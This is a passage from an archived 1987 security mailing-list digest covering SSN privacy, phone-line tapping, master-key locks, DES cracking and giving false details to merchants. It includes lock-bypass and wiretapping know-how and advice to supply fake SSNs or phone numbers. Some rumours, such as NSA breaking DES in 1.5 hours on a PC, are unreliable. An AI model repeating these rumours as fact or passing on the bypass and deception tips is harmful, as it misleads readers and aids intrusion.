photocopy of it when it arrives. Be troublesome, if necessary. 4) If you do see an error, put your dispute in writing and if you must mail it in, do so certified mail. Establishing the date you first suspected an error is important. SSA has ways of "scouting" an employer's records. Ask to have it done. 5) Check your W-2 for the correct SSN. Paystubs too, but especially the W-2. Report any error to your employer and IRS. 6) If you don't want to give your correct SSN to someone and feel you must fake it, give them a number that starts with "9". There is no such thing as a real 900-series number so you are not risking screwing up yours or someone else's account. SSA will never accept it. 7) If you get an official decision that goes against you, protest if you really believe you're being cheated. There are several appellate steps, and usually the official who decides is reasonably intelligent and responsible. Read the back of the notice about "reconsiderations", "hearings", etc. The reversal rate it very high. As a matter of interest, two years after I started work for SSA I requested a record of my earnings. Sure enough, there was an error in two quarters. Want to guess who the employer was that messed up? Yep, SSA. It took them 3 years to fix it. Good thing I had an "in". :-) I also discovered that my retired father should have been getting benefits for three of his student children (an SSA snafu). I had us apply, and asked for full retroactivity (over 8 years). The claims examiner awarded only 12 months of retroactivity. I appealed. We won. Total family benefits came to over $7000. I used my $1500 to buy a washer and dryer. Lance P. Keigwin (lance@ubvax.UUCP) (408)496-0111 (operator) 562-7738 (direct) From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama) 4-Sep-1987 16:55:46 To: security@RUTGERS.EDU Subj: [524] Telephone tapping via the isolation box It occurred to me, while watching the telco man install my data line, that the network isolation box provides very easy access to a line tapper. A line powered FM transmitter with a RJ11 plug and socket at each end would take less than two minutes to install start to finish. These thoughts have prompted me to install a locked cover over the box. -pbp From: ORG5NMC@cms1.ucs.leeds.ac.uk 7-Sep-1987 13:59:16 To: security@RUTGERS.EDU Subj: [766] Hello all, While talking to the cleaner of my office she showed me the master key to the floor on which I work. I examined it and found very little similarity between this master key and my own. It strikes me that most of the metal that my key is composed is only there to stop me opening other doors rather than to allow me to open my own! Does this mean that the key to my door is very much more simple than it looks? Does anybody know on what general principles these types of system are built on? Are these systems safe (It seems to me that taking a file to my key would allow it to open other doors!) enough? Neill. From: "Jerry Leichter" 10-Sep-1987 01:15:45 To: risks@csl.sri.com, security@RUTGERS.EDU Subj: [4550] DES and the criminal world Drugs and DES: A New Connection From "Logged On", by Vin McLellan - Digital Review, August 24, 1987, page 87 Anthony Prince Fairchild is doubtless a colorful rogue. Five years ago, when People magazine reported on a dispute between the Aspen sheriff and the Drug Enforcement Administration (DEA) about lax law enforcement in the Colorado resort town, Fairchild stepped forth - not to deny the DEA's allegations that he was running an Aspen "drug factory," but, rather, to defend eccentricity. "It's not against the law to be bizarre," he told People, which featured a photograph of him leaning back against a nude female mannequin he called Christina. Some may have found Farichild's face familiar. An engineer by education and trade, Fairchild had also been a model: His Salem-smoking visage has adorned millions of magazines and billboards. He's now 50 years old, but police still call him a "pretty boy." Last month at a pre-trial hearing in San Jose, Calif., Fairchild curled up on a courthouse bench reading Firestarter, while the curious strolled by to check him out. After all, Fairchild had just had his bail changed from $2.5 million to "no bail" out of fear that he would post the money and disappear. "He looks just like Timothy Leary," said an onlooker, referring to the LSD guru the '60s. If Fairchild isn't a legend like Leary, it may be because federal authorities have never publicized the extent of their interest in him, even though they've sought him several times over the years. But after being arrested last November with eight kilos of cocaine, $12,000 in counterfeit money and 85 pounds of high explosives, Fairchild became a topic of rumor in Silicon Valley, in the California drug culture and, oddly enough, among the nation's top security consultants as well. "The guy's got a brain," remarked one California investigator. "You maybe couldn't guess it to see the mess he's in, but he's done a lot of things - legit things - and some say he's just slightly short of being absolutely brilliant." Fairchild's resume indicates success in a half-dozen careers, most recently as an EDP consultant in Silicon Valley. It claims he holds 11 U.S. patents, and states that he was one of the authors of Digital Research's Concurrent PC-DOS. The police say this work record is accurate. Predictably, Silicon Valley police have been among the first to confront the probleme of criminal enterprises that digitally encrypt incriminating records. "There's one case like that every six weeks around here," noted a local police reporter. "It's become quite common." The method of choice is, of course, the Digital Encryption Standard (DES), the cipher approved by the U.S. government for commercial data security. Fairchild used a Winterhalter DES board in a DOS micro to keep what police believe to be an extensive diary of the affairs of a "large international drug ring." Local, state and federal narcotics agents are all very eager to gain access to Fairchild's records. Indeed, Santa Clara, Calif., police reportedly used covert FBI funds to have a privately owned supercomputer grind away at cracking the DES-encrypted data. The attempt was not a big secret. Several EDP security consultants were asked to suggest crypto attacks. What made the DES attack feasible, if still unlikely to succeed, was that the Winterhalter device uses a program to transform a 6-to-16-character password into the 64-bit DES key. The cops got lucky: With a pass through a full English dictionary, and by culling significant names and such from Fairchild's personal history, they were apparently able to guess three of four passwords that were used to encrypt files stored on his micro. The passwords were all eight or fewer characters in length, and all in lowercase letters. The diary file continued to elude their efforts, but the police reasoned that if the DES password for the diary was less than eight characters, a "brute force" approach to finding it was possible. A cryptoanalyst who is a leading consultant for California banks was hired to make the attempt. The supercomputer may have actually been chewing away when the Justice Department stepped in late last month to confiscate copies of the encrypted diary, presumably as evidence in a federal drug case against Fairchild. This pre-empted local authorities from possibly making the big score. From: 12-Sep-1987 16:33:57 To: security@red.rutgers.edu Subj: [1438] Garage door openers, etc I have seen garage door openers made for two doors, for split 2-door garages. I do not, however, think this is the forum to discuss them in. We have had a security breach here, on our VAX 8800 which is related to Social Security Numbers. We use the SS # as an account ID, and as the initial password for users. No, this was NOT my decision, and I do not like the concept, but I do like working here, so that's enough about that. We had a user using the WHO program who was looking up random SS #s until he found a hit, then he tried it to see if it was the password to the account. This wouldn't be so bad, since the system forces first-time users to change their passwords, except that this is the beginning of the academic year and there are a lot of new accounts arouund which haven't been logged on to. Needless to say, he caused a lot of trouble by sending troublesome mail messages to users, and generally wreaking havoc. Our response has been to disable each account he uses, one by one, but since he appears to be a dialup user in another city, (Our network spans 1100 by 1400 miles), there is not a whole lot we can do to him. We did correct the backdoor in WHO, though, so as to prevent another occurance of this type. Just one more reason to stay away from using SS #s! From: 12-Sep-1987 16:35:11 To: security@red.rutgers.edu Subj: [935] SS# Social Security numbers are a very volatile subject. I think the subject has been covered well in this digest. Most government agencies withhold their policy on SS #s simply because it is much more convenient for them when people provide them. There are very few government agencies which absolutely require that you disclose your number, however. Private companies are a different matter, however. They can refuse service if you don't meet their requirements, whatever they may be. As for changing all of this, it probably is too late in the game. Those of us who feel strongly enough to protest will be noticed, but face it, the average person is going to take the path of least resistance. There will always be more than enough people who quietly go along with it to offset those of us who resist. From: Don Chiasson 14-Sep-1987 17:55:13 To: security@RUTGERS.EDU Subj: [442] Codebreaking article Spectrum, the magazine of the IEEE (Institute of Electrical and Electronics Engineers) is doing a series of articles on Electrotechnology in World War II. The September 1987 issue has an article "Breaking the Enemy's Code" (pp. 47-51). Nothing drastically new in it, but is is interesting. Don From: *Hobbit* 30-Sep-1987 17:19:13 To: Security-digest: ; Subj: [12419] Summary of msgs concerning: giving out phone numbers These are being sent as a digest to save some time and network bandwidth. Also, some of these messages are from a time when the inet newsgroup "misc.security" was erroneously configured as an unmoderated group, which is why there's a lot of query/response going on before the messages ever made it to the "real" list. [This problem has been fixed...] _H* -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: 1 Sep 87 00:10 PDT From: William Daul / McDonnell-Douglas / APD-ASD Subject: Re: giving out your phone number For what it is worth, when asked for my phone number on charges or checks, I usually give some random phone number (with a valid prefix). I know my credit is good and there is no reason for them to know my phone number. --Bi// -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 1 Sep 87 8:27:05 EDT From: Dennis G Rears (FSAC) Subject: Re: giving out your phone number I don't know if they can force you to give your phone number or for that matter your address but how can they verify it? Whenever I am asked to give them my phone number or address I give them an address in a fake town (Tulga, Fl) and a fake phone number (813-622-1212) which happens to be the number for time. It's easier to lie about it than argue with the clerk. I believe though they can refuse to let you use your credit card without it though. Just like they do not have to take checks. An interesting idea though is stores' refusal to take 50 and 100 bills. I went to McDonald's the other day and tried to pay with a $50 bill but they demanded identification. I refused, said to them "take it or give me the food for free". They still refused, I took the food and sat down to eat. The manager came and said he would call the police if I did not pay for the food, I said, I offered to pay and you refused to take it. After I pointed at that a $50 bill is legal tender and is against the law to refuse to take it he finally relented and allowed the cashier to take the money. Dennis -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Wed, 2 Sep 87 10:54 CDT From: "Mike @ (214)575-3517" Subject: RE: ss# in a similar vein... EVERY time I buy something at Radio Shack they want to know my address. I really don't mind them knowing it I guess, but it sure wastes my time so I usually refuse. I've gotten into a heated argument over this with the sales person (sometimes they claim that they need it to validate the warrentee). I still refuse. It seems that they are scored on the percent of addresses they get. If they get less than 90% they get fired. Mike -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: "J Scott Goldberg @eldest" Date: Wed, 2 Sep 87 17:36:24 PDT Subject: Re: giving out your phone number I've found a way of handling requests for my fone number that works pretty well - I just give out my work number. (In fact, many merchants will choose a daytime number given the choice!) I developed this approach first in terms of my address, as I've had a P.O. box since those college days of frequent apartment changes. When a merchant "simply must" have a street address, I offer some positive statement ("I'll be happy to give you my work address - ...") that satisfies their need before it gets to the otherwise seemingly inevitable refusal confrontation. thnx J Scott Goldberg TeleSoft {sdcsvax,hp-sdd,scubed}!telesoft!jgoldberg 5959 Cornerstone Court West telesoft!jgoldberg@sdcsvax.ucsd.edu San Diego, CA 92121 -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Wed, 2 Sep 87 23:59:41 EDT From: WALLACE%UMDB.BITNET@wiscvm.wisc.edu Subject: giving out your phone number Working in a retail store, I do know that we were instructed to get a persons phone number on the charge slip. *IF* the customer does not give you *A* phone number, you must void the sale, or use another payment method. This was the rule for a very large family drug store. Wallace@UMDB -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 1 Sep 87 17:05:22 EDT From: Steven_J._Gold@um.cc.umich.edu Subject: giving out your phone number "When you use a credit card, store clerks always ask you ti sign the receipt and write down your phone number. ... can they force you to give out your phone number?" This is a very stupid practice which seems to occur only in the USA -- I've never been asked for my phone number on a charge slip in Canada or Europe. What makes it "stupid" is the false sense of security the merchant gets from a string of digits when no attempt is made to validate the information! Since some merchants "require" a phone number, I give them one: a local computer access number! Of course, I could give them anything-- an IRS office, the White House number, or a purely random string. They would accept it, gladly, and I know they would never call it. So, can "they" force you to give out your phone number? NO! They can only force you to give them a string of digits which may or may not be your number. SGold@um.cc.umich.edu -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Fri, 4 Sep 87 15:32:46 CDT From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama) Subject: Re: giving out your phone number Restaurants almost always request your phone number when paying a meal check with a credit card. The single biggest use they have for it is calling customers who forget to pick up their cards when they leave. My solution is to put the card away, THEN sign the form. -pbp -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Subject: Re: SS and the data theives... Date: Fri, 11 Sep 87 08:49:05 -0700 From: kent@decwrl.dec.com They don't check this number as part of verification. In restaurants, it's not even requested until you're signing the slip and leaving. I wonder what they do with this info. It might help someone who's fradulently using your credit card number. It might also be sold to telemarketing firms. Again, why not submit a false one? I regularly leave my work phone or a string of seven random digits (sometimes I mentally spaz and leave my phone number from two years and 2000 miles away...). I used to get the story that this number was requested to handle cases where the purchase was under the floor limit, so if something later went wrong with the charge (when they finally got around to entering it), they could get in touch with you. However, everyone (at least in the SF Bay Area) now routinely has magstripe readers attached to phone lines, and they all seem to get phone approvals on every purchase, so I don't know why the hell they still want my phone number. Sometimes I get ornery and say I don't have one, or that it's unlisted, and this causes them utter confusion. Great fun, if you're in the right frame of mind. I think it's just force of habit these days, combined with a submissive public. Cheers, chris -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Fri, 11 Sep 87 10:31:11 EDT From: Simson L. Garfinkel Subject: Re: SS and the data theives... I started giving false names and phone numbers at Radio Shack when I was 10. I didn't know why they were asking my name and address and phone numbers on *cash* purchases. My theory was that if I gave them a lot of different addresses, and they sent their catalog to each address, it would cost tem a lot of money and eventually they would give up. Hasn't happened so far. Once, I told the clerk that my phone number was "555-1212." Didn't seem to phase him, though. To my knowledge, the only time that you are required to give your SSN is for tax purposes (bank, job, financial aid, &c). I don't know if you can be arrested for fraud if you give a false SSN but don't sign a form saying that you've given a false SSN. ................................................................simson -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sat, 12 Sep 87 08:54:20 CDT From: John Voigt - Systems Group Subject: Re: SS and the data theives... > Again, why not submit a false one? I have an unlisted phone number that I NEVER give out for use on credit slips. I usually give my old number which has been disconnected with no forwarding number. I don't know why they ask for it (except that the credit card people pressure them to) but I've already given them my drivers license and that has me SS#..... :-) John/ -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sat, 12 Sep 87 20:26:17 EDT From: Brint Cooper Subject: Re: SS and the data theives... Many folks have written with perfectly plausible explanations about why merchants take my phone number on a credit card charge. What these fail to address, however, is that if I'm perpetrating a fraud in the use of this credit card, I'm not about to give out a correct phone number. They make no effort to validate the phone number before I leave, so what they're doing is collecting the phone numbers of a bunch of honest people. Now then...Why are they collecting the phone numbers of a bunch of honest people? _Brint -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Mon, 14 Sep 87 21:36:59 EDT From: Neil Duffee <470820%UOTTAWA.BITNET@wiscvm.wisc.edu> Subject: Re: SS and the data theives... In reply to Brint Cooper's notion of providing a false SSN number, this would not work here in Canada (nor probably the US either) since the SIN (our local equivalent to SSN) uses a check digit which can be verified readily by hand. Now, whether the clerk you are working with happens to know the appropriate formula or not...... As for the telephone numbers with credit cards, while working for Bank of Montreal Mastercard in Vancouver several years back, this extra information is also not required. It seems to be the merchants' personal way of gathering a little extra information should they be stuck with a bum (ie. fraudulent) purchase. As an example, they are actually required, (not supposed, required) by their merchant's agreement with the Banking institution, to check each and every purchase made with their copy of the 'hot' sheet. But, since they think it is a waste of time, a simple phone number usually will do. (Have you ever actually supplied the wrong number?) In this particular instance, refusing the extra information is only the first step. Next, you could ask to see where it is stated in their merchant's agreement (good luck trying to find their copy - besides it's not written in your cardholder's agreement, is it?) Lastly, make a complaint to the Banking institution issuing the card as all merchant agreements are negociated on an individual merchant basis. Besides, they have much more clout with this crummy individual and will, undoubtedly, want to keep someone with such an outstanding credit rating as yourself. Right? :-> Neil Duffee Bitnet: NJD2F@UOTTAWA (Consultant biz) 470820@UOTTAWA (student works) -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Mon, 14 Sep 87 22:10:46 EDT From: bzs@bu-cs.bu.edu (Barry Shein) Subject: SS and the data theives... > Again, why not submit a false one? Or your work phone? Or whatever? Well, now c'mon. A couple of weeks ago I got a call from the photo store down the block that I had left without signing the credit slip. They got the phone number as you said (I had written it on the slip.) Honest mistake, I went down and signed it. I suppose if I hadn't written the right phone # down they would have had the choice of either figuring out some other way to pursue me (perhaps MC would give them info or forward mail) or eating the 25 bucks. To paraphrase Blanche DuBois: They have always relied on the kindness of strangers. -Barry Shein, Boston University -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 15 Sep 87 09:11 PDT From: "The Bandit . . . (on RITA)" Subject: RE: Re: SS and the data theives... I once asked why you are asked for your phone number when using your charge cards. The clerk explained that theives have been caught because they stupidly put down THEIR home phone number, not the phone number of the person who "owned" the card. Derek Haining From: mason@OBERON.LCS.MIT.EDU (Nark Mason) 23-Sep-1987 08:20:09 To: jh@ATHENA.MIT.EDU, security@red.rutgers.edu Subj: [462] Re: ssn's Again I will ask... I've seen lots of messages on this list anout ways to keep your SS# secure, but still I haven't seen anyone give a reson *why* to keep it secure. Why bother? What horrible deed can be done with it that makes it worth not giving it out and the hassle that might follow? curious in cambridge From: ssr@tumtum.cs.umd.edu (Dave Kucharczyk) 23-Sep-1987 09:49:09 To: MISS026%ECNCDC.BITNET@wiscvm.wisc.edu, security@RED.RUTGERS.EDU Subj: [850] re: Garage Door Openers Just swapping crystals with a DPDT switch isn't as easy as it sounds. The wire from the crystal to the switch and from the switch to the holder may cause unstable operation or even no oscillation. Also that means you have to swap crystals in one of the garage door opener receivers. If the change in frequency is any appreciable amount the receiver will have to be retuned. An easier way to control two units with one remote is to get one that has a digital code (settable internally by a dip switch). Simply get two openers end set then one bit apart in digital code. Then have the switch for that bit connected to an external switch on the remote controller. ssr From: jh@VENUS.MIT.EDU (Joe Harrington) 23-Sep-1987 13:46:27 To: security@red.rutgers.edu Subj: [1518] ssn's I have heard many explanations for keeping a hidden ssn. The most important one, in my opinion, is that it is much easier to sort records on a computer or in a paper filing system by a unique number, rather than by name (since names are not unique). If everyone uses the same number to refer to you then a huge amount of information can be gathered about you in a very short amount of time by someone with either authority or connections saying to dozens of employers, credit agencies, the IRS, the Registry of Motor Vehicles, the military, the police, the FBI, insurance agencies, hospitals, the schools you have been to, and practically any other organization with which you have had dealings and which keeps records "Tell me everything you know about 888-24-3315." I don't like information about me to be that accessible. Certainly it is almost as easy to say, "Tell me everything you know about John Wlodarczyk," which is one reason why many people don't hide their numbers. Other reasons include the moral position that people should not be reduced to numbers in a machine (though I guess those people have never heard of ASCII), and the legal position that the intent of a law should not be broken (the Social Security Act of 1933 may have loopholes, but as I understand it, the intent was clearly NOT to allow the number it assigned to anyone to be used for any other purpose). --jh-- From: *Hobbit* 30-Sep-1987 17:21:14 To: security@RED.RUTGERS.EDU Subj: [932] garage frobs Mounting the crystals "elsewhere" in the box will probably cause the transmitter to go off half-cocked from stray capacitances, and possibly not open the door anymore. If you pull something like this make sure of the usual RF procedures, short leads, shielding, etc... And why are garage door openers not a topic of security? It seems that those of you who own them are relying on them to keep vagrants out of your garage. Most remote door opener installations are done such that the manual locking mechanism of the door isn't used anymore [otherwise, it wouldn't open remotely]. A similar discussion was had about passive-RF cards a while back. There's always the fact that someone can concievably listen to what your opener says when you drive up, and thus effectively have a key to your house... _H* From: gatech!codas!ki4pv!tanner@rutgers.edu 21-Sep-1987 11:25:39 To: security@red.rutgers.edu Subj: [671] Re: Dogs, defense against The mail carriers use something called "HALT!", the active ingredient of which is oil of cayenne pepper. Very effective; the lingering effect of the cayenne oil assures that the dog will remember the stuff. I get mine at the local bicycle shop. It goes for about $6; your prices may vary. I find that it takes an average of two applications before a dog will lose interest in chasing bicycles; some dogs do learn after the first application while others never learn. Tanner Andrews, Systems CompuData, Inc. DeLand From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 24-Sep-1987 16:44:06 To: security@red.rutgers.edu Subj: [501] ssn's I've been giving out my MIT 888 number as my SSN for several years now. Infact, when I recently got my columbia university ID number, I got them to use my MIT ID number rather than my SSN number. So the real question is this: How many databases list my MIT 888 number as my SSN number? ................................................................simson From: dplatt@teknowledge-vaxc.arpa (Dave Platt) 25-Sep-1987 17:29:28 To: PERSHNG@ibm.com, security@RUTGERS.EDU Subj: [1568] Anti-dog (and anti-mugger) sprays As I recall, "Halt!" and some similar products contain an active ingredient known as "capsicum oleoresin"; it's basically essence of hot pepper (capsicum resin) dissolved in oil (oleo). It's certainly effective at stopping dogs, and I imagine that it's probably just as effective in stopping humans unless their pain sense has been numbed (e.g. by PCP or a similar illegal drug). I saw an article a couple of years ago that mentioned capsicum oleoresin sprays, and their use as a personal-defense weapon. The article mentioned one potentially serious problem: this ingredient has _not_ been legally authorized as "safe and effective" for use in defensive sprays that are to be used against humans. [From what I remember of the article, CS and similar tear gasses have been tested and found not to cause long-term injury to the eyes and respiratory system; capsicum oleoresin has not been tested in this way]. This could, potentially, lead to the following unfortunate scenario: you're walking down the street, are approached by someone who make threatening moves (but doesn't actually touch you), you zap him with Halt!, call the police, and the alleged assailant files charges against you, for assault with a caustic chemical. You end up in jail. I don't know of any case where this has actually happened, but the article I read indicated that it was potentially possible. User beware! From: kludge@pyr.gatech.edu (Scott Dorsey) 25-Sep-1987 23:30:44 To: misc-security@gatech.edu Subj: [997] Re: Telephone tapping via the isolation box paul@UXC.CSO.UIUC.EDU (Paul Pomes - The Wonder Llama) writes: >It occurred to me, while watching the telco man install my data line, that >the network isolation box provides very easy access to a line tapper. >A line powered FM transmitter with a RJ11 plug and socket at each end >would take less than two minutes to install start to finish. It takes a lot less time than that. Even more fun... take a look at your supply closets and broom closets at work (and maybe the bathrooms). You'll probably find banks of #66 punchdown blocks with each line carefully labelled on them. Not only can someone walk in and make free phone calls, but dropping a tap in is simple. Keep the phone cabinets locked, and remember that the phone is never very secure in the first place. -- Scott Dorsey Kaptain_Kludge Internet: kludge@pyr.gatech.edu From: mlinar%poisson.usc.edu@oberon.usc.edu (Mitch Mlinar) 25-Sep-1987 23:33:09 To: misc-security@ucbvax.berkeley.edu Subj: [1985] Re: Telephone tapping via the isolation box >These thoughts have prompted me to install a locked cover over the box. That is hardly worthwhile. What you have done MAY stop a true amateur, but wire tapping can be cleanly done anywhere along your phone line. There are some interesting gadgets I saw at a convention which clamp onto any phone line (outside or inside your house) WITHOUT need of a physical contact to the wire itself and filter out the background clutter to send a clean FM signal up to 1/4 mile away. (This was a closed convention in '84 for security types only; I happened to be consulting as a computer expert and needed to find products that were amenable to computer monitoring.) By the way, the price for this goody at the time was around $350 - cheap by most standards - and could be installed in 15 seconds. The receiver (a bit more pricey) could even filter out multiple signals (if it was clamped over two lines instead of one), but required some manual work to keep it focused if both lines were in use. A more interesting gadget was an HP spectrum analyzer which was tied to a computer and display as well as a nice IF antenna. You got it. ANYTHING typed on the IBM-PC about 100ft away (for effect) appeared on the monitoring display. (Whoever said that emissions for PCs was small!) The antenna was directional, and for "kicks", the demonstrator turned it towards another known PC in the auditorium. We watched every character that the person at the Vivitar security booth typed in! I don't mean to pick on you, Paul, but the state-of-the-art is well beyond your deterent. Unless you reinstall your phone lines with two ground coax (all the way to the telephone pole) and get your PC TEMPEST equipped, the lock cover is about as effective as dead-bolting your doors while leaving the windows open... -Mitch From: sunybcs!kitty!larry@rutgers.edu 26-Sep-1987 10:52:43 To: security@RUTGERS.EDU Subj: [532] Re: Telephone tapping via the isolation box > These thoughts have prompted me to install a locked cover over the box. And what, pray tell, do you plan to do about all of the unlocked, outside cable terminal boxes between your building and the telephone company central office? <> Larry Lippman @ Recognition Research Corp., Clarence, New York <> UUCP: {allegra|ames|boulder|decvax|rutgers|watmath}!sunybcs!kitty!larry From: "Miles R. Fidelman" 30-Sep-1987 09:47:17 To: security@RUTGERS.EDU Subj: [711] re: master keys At least one way of setting up master keys is to use locks with pins that have multiple segments. In a normal lock, each pin is split into two pieces. The key pushes each pin up the amount necessary to line up the splits of all pins at the boundry between the stationary and rotating points of the cylinder. In one of these special locks, each pin is made of multiple segments, i.e. there are two or more postitions in which each pin will allow the lock to rotate. My guess is that there are relatively safe ways to set up the keying, and relatively unsafe ones. Miles From: dplatt@teknowledge-vaxc.arpa (Dave Platt) 30-Sep-1987 13:15:30 To: security@RUTGERS.EDU Subj: [3885] Master keys It strikes me that most of the metal that my key is composed is only there to stop me opening other doors rather than to allow me to open my own! Does this mean that the key to my door is very much more simple than it looks? Probably not. If your door's lock mechanism is built along the usual master-key lines, then it has as many pins as a non-master-keyed lock of similar manufacture. The pins, however, are designed somewhat differently. Familiar with the construction of a standard pin lock? The top half looks a bit like this, in cross-section: ------------------------------------- | @ @ @ @ @ | @ = small spring | @ @ @ @ @ | # = upper half of pin | # # # # # | % = lower half of pin |____________#__#__#__#__#__________| _ = cylinder wall | # # # # # | | # # # % # | | # % # % % | |------------%--%--%--%--%----------| % % % % % | keyway -> % % % % % | % % % % % | |-----------------------------------| When you insert your key in the keyway, it pushes the bottom halves of the pins upwards, thus pushing the upper halves of the pins upwards and compressing the springs. If the notches on your key are each of the correct height, then the pins will all come to rest with the top-half/bottom-half line lying just at the cylinder wall. This will free the cylinder to rotate, and operate the bolt or latch. If any of the key notches is too high or too low, then the top-half/bottom-half line on its corresponding pin will lie either above or below the cylinder wall, and one of the two halves of the pin will prevent the cylinder from rotating. A master-keyed lock works in very much the same way, except that the pins come in three parts, not two. The cylinder will be able to turn freely if each pin lies in either of two possible positions; either the top-section/middle-section line must lie at the cylinder wall, or the middle-section/bottom-section must lie at the cylinder wall. From your description (your key has more metal than the master key), it sounds as if your key is designed to make the pins line up along the middle-section/bottom-section line, and the master key lines them up along the top-section/middle-section line. This would indicate that the (bottom-section length + middle-section length) for each pin is the same for all of the locks on that particular master-key system, but that the actual lengths of the bottom and middle sections differ between the locks. Are these systems safe (It seems to me that taking a file to my key would allow it to open other doors!) enough? Depends what you mean by "safe enough". They're certainly less secure, as there are obviously two different keys that can open the lock. Worse yet, there are probably even more than that: since each pin can be operated in either of two different positions, there are 2^(#-of-pins) different notch combinations that can operate the lock, out of M^(#-of-pins) possible notch combinations (where M is the number of different depths to which a notch can be cut). I imagine that these locks might also be a bit easier to pick than a non-master-keyed system. and, yes, if you were to take an impression of the master key, and simply file down your key until it matched, then you'd probably have a key that would open your door and many others as well. If you have material that you really want kept secure, I'd suggest locking it up in a secure cabinet, using a difficult-to-pick padlock which is not master-keyed and to which you have the only key(s). From: msmith@topaz.rutgers.edu (Mark Robert Smith) 30-Sep-1987 13:19:09 To: misc-security@RUTGERS.EDU Subj: [1710] locks My adolescent curiosity got the best of me in high school on a similar situation. One day, I showed up early for a play rehearsal, and found the door to the drama room locked. Someone else was there and in jest, I decided to try my keys to see if they'd work. Lo and behold, my home back-door key opened the door. I then tried the rest of the building and found to my amazement that the key opened about 3/4 of the doors to the building. As a matter of fact, I could get into just about any room but the science labs. The technical explanation for this is that the school had 6-pin Falcon locks, and I had a 5-pin Kwikset standard house door lock. The inner 5 pins of my key were very close to the inner 5 pins of the master (I eventually saw it after a long explanation to the Vice-Principal) and the little notch to make the key go in smoothly was the same height as the 6th pin on the master. Thus, the lock "thought" that my key was the master. Eventually someone stole all of the keys to the building and hid them in the main office ceiling (they didn't find them for 18 months) and the whole building was re-keyed, to a much better system. To answer the question posed by the original poster, I would say that the locksmith who keyed his building did a bad job. The master should have some pins higher than most, some lower. It sounds like your master has all pins lower than the individual keys. Therefore, yes, you should be able to file your key down to the master and use it for everything. Smitty -- Mark Smith (alias Smitty) msmith@topaz.rutgers.edu From: *Hobbit* 2-Oct-1987 17:57:31 To: security@RED.RUTGERS.EDU Subj: [2449] master keys Ah, finally someone *else* talks about locks... Master key systems can be done correctly or done stupidly. Normally [i.e. correctly] the cut heights for the master are mixed as to whether they're above or below the cut heights for the non-master key[s], and placed a sufficient distance away so that there's no possibility of placing pins at the master position by wiggling the slave key or inserting it to funny places. Often mastered systems use very thin splits [the little wafer inserts between the pin and the driver that allow the lock to open at different cut heights] which can jam or fall out of the cylinder. If the maid's key cuts were all lower than the cuts on your office key, then the system was done stupidly, and you could generate a master by cutting your key down to the master level. [You can determine the master level by taking your office lock apart and loading in just the master pins/splits as a template.] I suspect that there are quite a few systems out there that are done this way. Suspect this if all the slave keys look like they don't have too many low cuts in them. Sometimes odd-shaped drivers called mushroom drivers are used in heavily mastered systems, in an attempt to make them harder to pick. These will allow the plug to cock over a little bit during picking but with the given pin in the wrong position, so that additional fiddling has to be done to get it to the right position. Some older Russwins use ball bearings in place of rounded pin ends to reduce wear in heavily-used locks. [If you take your lock apart, of course, keep very close track of where everything went, or it obviously won't work anymore...] To disable the master position and only allow your office key to work the lock, you'd normally have to obtain different pins of the right heights. You might get lucky, however, and find two pins whose mastering parts could be swapped, changing the master height there but leaving the slave height. Then the maids couldn't get in but you could. I suspect that there are quite a few of us that majored in locksmithing in high school, and were dearly loved by the deans. If only I had had the presence of mind back then to explain to them how locks are perceived as little puzzles to take apart and solve, not as something standing in the way of theft. _H* From: "GLENN EVERHART, 609 486 6328" 26-Sep-1987 07:28:57 To: Security@RED.RUTGERS.EDU Subj: [3469] Secure phones The NSA is involved in distributing these phones as part of a more general effort to get at least some US companies to have reliable security. The story I've heard (though I don't have it from classified sources) is something like this: 1. DES was originally certified, but was designed with a short enough key that NSA could break it by brute force. (It IS a federal law that no cipher may be used for international traffic that NSA can't break, so the permeability of DES follows from reading the relevant US Code sections.) The classified algorithms are said to differ from DES mainly in the length of their keys. 2. Recently, someone furnished NSA with an efficient DES breaking algorithm. This was said to take 1.5 hrs. on an IBM PC to break a DES cipher. I understand that hard details of this have been classified and NSA does NOT particularly want to confirm this. Still, some NSA employees have confirmed that DES is not nearly as secure as was originally thought. Thus, NSA isn't going to certify DES again, at least not willingly, because they KNOW it's breakable. (It's been suggested that a different key scheduling data area could give a more secure algorithm, but the generator for the key schedulers is not available, at least not readily.) An Australian friend of mine mentioned he saw an article on breaking DES back in '79 or '80 in the Proceedings of the Soviet Academy of Sciences, but has since told me the article deals only with certain classes of keys. (BTW, it also mentions that if you insist on choosing large PRIMES for public key cryptosystems keys, the public key systems become fairly easy to crack also; what's needed are RELATIVELY PRIME numbers, not primes.) 3. Since DES has proven embarassingly easy to crack, and since large amounts of money are "protected" by it, NSA is proposing to let industry use the "real stuff", the algorithms they use themselves, which hopefully are less permeable. To do so, they furnish algorithms and keys (preserving the ability they have by law to decipher the text), but are paying fairly large sums to develop these phones and other boxes. A good deal of custom microelectronics is involved. And this is why you see NSA discussing crypto phones etc. (You are of course aware I trust that ANY phone conversation that gets onto microwave is potentially as open to interception as home radiophones are...and many of thesse links to industry ARE monitored...) I've heard another story someone might comment on: Some US company (I forget which; it's not important) sent a binary copy of an operating system over wire to England. However they used the unix crypt tool on it first, more than once and with different keys. The story is they got a call a few days later from NSA demanding they give NSA the keys used to encipher it. The algorithm is just character XORs with a string. But if you do it several times with strings of lengths that are relatively prime, couldn't the effective string become the product of the key lengths, and quickly grow comparable in size with the original message? Does anyone out there know enough cryptography to tell me whether this is really a super cheap and strong cipher, or whether it's just a minor nuisance for folks who go in for this sort of thing? Glenn Everhart%Arisia.decnet@ge-crd.arpa From: TS5864%OHSTVMB.BITNET@wiscvm.wisc.edu 28-Sep-1987 14:56:49 To: SECURITY@RED.RUTGERS.EDU Subj: [1189] Social Security Numbers 